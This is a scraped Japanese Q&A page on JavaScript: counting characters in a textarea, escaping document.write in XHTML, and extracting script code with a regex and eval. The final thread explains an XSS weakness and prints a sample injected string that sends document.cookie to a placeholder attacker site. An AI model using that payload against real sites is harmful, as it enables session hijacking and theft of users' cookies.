下記だと文字数がなんか変なんです。???の状態です。
#文字を追加したりすると正常な文字数にならず。
#環境IE5.0

<SCRIPT language=JavaScript>
function test()
{
alert( testarea.value.length ) ;
}
</SCRIPT>
<TEXTAREA NAME="testarea">あいうえおか</TEXTAREA><BR>
<A HREF="test.html" onmouseover="test()">文字数チェック</A>

このQ&Aに関連する最新のQ&A

A 回答 (2件)

こんな風にしてみては?



function test()
{
  str = testarea.value.replace(/\r\n|\r|\n/g, '');
  alert(str.length);
}

全ての改行を抜いて、文字数をカウントします。
    • good
    • 0
この回答へのお礼

皆様、回答ありがとうございました。javascript初心者としてははじめての記述内容もあり、勉強になりました。そして、初心者としては、より簡単な方法で、今回の課題は解決させていただきます。

(^^;

お礼日時:2001/05/18 12:00

 テキストエリアの中で改行した時におかしくなりませんか?


 Windows 上では、改行文字は復帰文字( "\r" )と行送り文字( "\n" )の
2文字で構成されますので、「あいう<改行>えおか」と入力した状態だと 8文字
となります。
 改行文字があるかどうかは、

  testarea.value.indexOf( "\r\n", i )

で検索できます。見つかれば 0から数えて何文字目にあるかが返ってき、見つから
なければ -1 が返ってきます( i には 文字列の何文字目から検索するかを指定
します)ので、改行文字が何文字あるかを調べてその分減らしてあげましょう。
(改行文字を数えないのであれば 改行文字数×2を、1文字として数えるのであれば
改行文字数を引けば良いですよね)

※ Macintosh や Unix などでは、改行を構成する文字や文字数も異なります。
    • good
    • 0

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!

このQ&Aと関連する良く見られている質問

Q 内に書くことはできません」

元アルバイト先に頼まれてサイトを作り運営しているのですが、わからないことがあるので教えて下さい。

サイトはXHTML1.0 Transitional で作っており、ここに、http://fmono.sub.jp/ の「w3Analyzer」を組み込みアクセス解析をしています。サイト自体もこのアクセス解析も正常に動作しています。
ただ、このサイトをhttp://openlab.ring.gr.jp/k16/htmllint/htmllint.htmlで構文チェックすると、アクセス解析のタグにエラー「<img>を~行目の<script>~</script>内に書くことはできません。」が表示されてしまいます。
エラーが表示されるタグは下記のようなものです。

<script type="text/javascript">
document.write('<img src="http://~/w3a/writelog.php?ref='+document.referrer+'" width="1" height="1" />');
</script> >

アクセスログは普通に取得できているので問題ないのですが、もし上記エラーを回避する方法があればご教授下さい。よろしくお願いします。

元アルバイト先に頼まれてサイトを作り運営しているのですが、わからないことがあるので教えて下さい。

サイトはXHTML1.0 Transitional で作っており、ここに、http://fmono.sub.jp/ の「w3Analyzer」を組み込みアクセス解析をしています。サイト自体もこのアクセス解析も正常に動作しています。
ただ、このサイトをhttp://openlab.ring.gr.jp/k16/htmllint/htmllint.htmlで構文チェックすると、アクセス解析のタグにエラー「<img>を~行目の<script>~</script>内に書くことはできません。」が表示されてし...続きを読む

Aベストアンサー

XHTML には「ホンモノの XHTML」と「ニセモノの XHTML」があります。「ホンモノの XHTML」とは application/xml または application/xhtml+xml として識別されるもの、「ニセモノの XHTML」は text/html で識別されるものです。

※実際にはどちらも本物です。ここでは「HTML 互換として処理される XHTML」を「ニセモノ」、「XML として解析される XHTML」を「ホンモノ」と、カタカナ&カッコ付きで書いています。

「ホンモノの XHTML」として見れば、質問文のソースは妥当性違反です。なぜなら、img 要素のタグがエスケープされていないため、これがスクリプトの一部ではなく文書構成要素だと判断されるからです。XHTML 1.0 のスキーマは、script 要素内に img 要素が出現することを許していません。もちろん、スクリプトとしても正しく動作しません。

従って、XML のルールに従ってエスケープする必要があります。特に「<」と「&」は必ずエスケープしなければなりません。

document.write('&lt;img .... />');

ですが面倒なことに、「ニセモノの XHTML」ではこれが動作しなくなります。「ニセモノの XHTML」は、HTML との互換性のために script 要素内の「<」「&」をうまく扱ってくれるのですが、それが仇となり、上記では「&lt;」が「<」に戻りません。

ならば、コメント区間にするのはどうでしょう。XML でもコメント内なら「<」「&」が現れても大丈夫です(ただし「--」だけは駄目です)。

<script type="text/javascript"><!--
document.write('<img .... />');
//--></script>

「ニセモノの XHTML」ならこれでも構いません。しかし、「ホンモノの XHTML」では、コメントは本当に破棄されてしまい、上記では動作すらしなくなります。

そこで、XML/HTML のルールを使わず、JavaScript のルールでエスケープすることを考えます。

document.write('\u003Cimg .... />');

これなら大丈夫でしょう。XML/HTML に限らず、言語が混在する際は必ず適切なエスケープを施す必要があります。エスケープを避けたければ外部スクリプトにして下さい。


なお、ここには別の問題があります。そもそも「ホンモノの XHTML」では、document.write を使用できません。これは HTML 互換の機能だからです(HTML5 に明記されています)。

XHTML を採用するのであれば、それが「ホンモノ」でも「ニセモノ」でも大丈夫なよう、document.write に頼らないコードを作成して下さい。あるいは try...catch で括るなどして、「ニセモノ」として処理されたときのみコードが動作するよう工夫して下さい。あるいはいっそ、XHTML を止めるのも 1 つの選択でしょう。

XHTML には「ホンモノの XHTML」と「ニセモノの XHTML」があります。「ホンモノの XHTML」とは application/xml または application/xhtml+xml として識別されるもの、「ニセモノの XHTML」は text/html で識別されるものです。

※実際にはどちらも本物です。ここでは「HTML 互換として処理される XHTML」を「ニセモノ」、「XML として解析される XHTML」を「ホンモノ」と、カタカナ&カッコ付きで書いています。

「ホンモノの XHTML」として見れば、質問文のソースは妥当性違反です。なぜなら、img 要素のタ...続きを読む

Q内のコードの抽出方法

Ajaxで読み込んだHTML文書内にあるスクリプトのコードだけを
抽出したいのですが、正規表現を教えてください。
自分で考えてみたものは、以下の方法です。
これが最良なのかわかりません。
「スクリプトは複数箇所に存在しない」という条件で構いません。
宜しくお願いします。

var HTML = 'ここにHTML';
HTML.match(/.*<script.*>([\w\W]*)<\/script>.*/);
scr = RegExp.$1;
eval(scr);

Aベストアンサー

>改行が
ああそうか・・・ mフラグ付けると どう?
ダメなら [\s\S]* とか使う事になると思うけど・・・

Q 要素の内

▽安全なウェブサイトの作り方
  http://www.ipa.go.jp/security/vuln/documents/website_security.pdf

><script>...</script> 要素の内容を動的に生成しない
>ウェブページに出力する<script>...</script>要素の内容が、外部からの入力に依存する形で動的に生成される場合、任意のスクリプトが埋め込まれてしまう可能性があります

・P25で上記のように書かれているのですが、理解できません(何故ここだけ動的生成してはいけないのか等)
・具体的にどのようにして埋め込まれる恐れがあるのでしょうか?
・またここで書いている内容は、下記何れを指しているのでしょうか?
・ココカラ<script>...</script>ココマデ
・<script>ココカラ...ココマデ</script>

Aベストアンサー

攻撃の容易性でしょう。

この脆弱性を付く攻撃をする際に一番苦労するのが <script> をどうやって埋め込むかです。これは入力内容のエスケープ処理で大体は塞がれてしまうのですが、<script> 要素内に直接埋めこめられるならその問題が無いので、かなり攻撃しやすいサイトとなります。

埋め込み方法ですが、以下の様な生成をするサイトの場合なら

入力内容: 太郎
出力内容: <script>alert('こんにちは太郎さん')</script>

そのサイト内で使用している cookie 内容を盗聴するために、以下のように攻撃できます。

入力内容: ');window.location='http://攻撃サイト/'+document.cookie;a=('
出力内容: <script>alert('こんにちは');window.location='http://攻撃サイト/'+document.cookie;a=('さん')</script>

引用符のエスケープ処理で塞がれるかもしれませんが、それでも対処できる余地はあります。


人気Q&Aランキング

おすすめ情報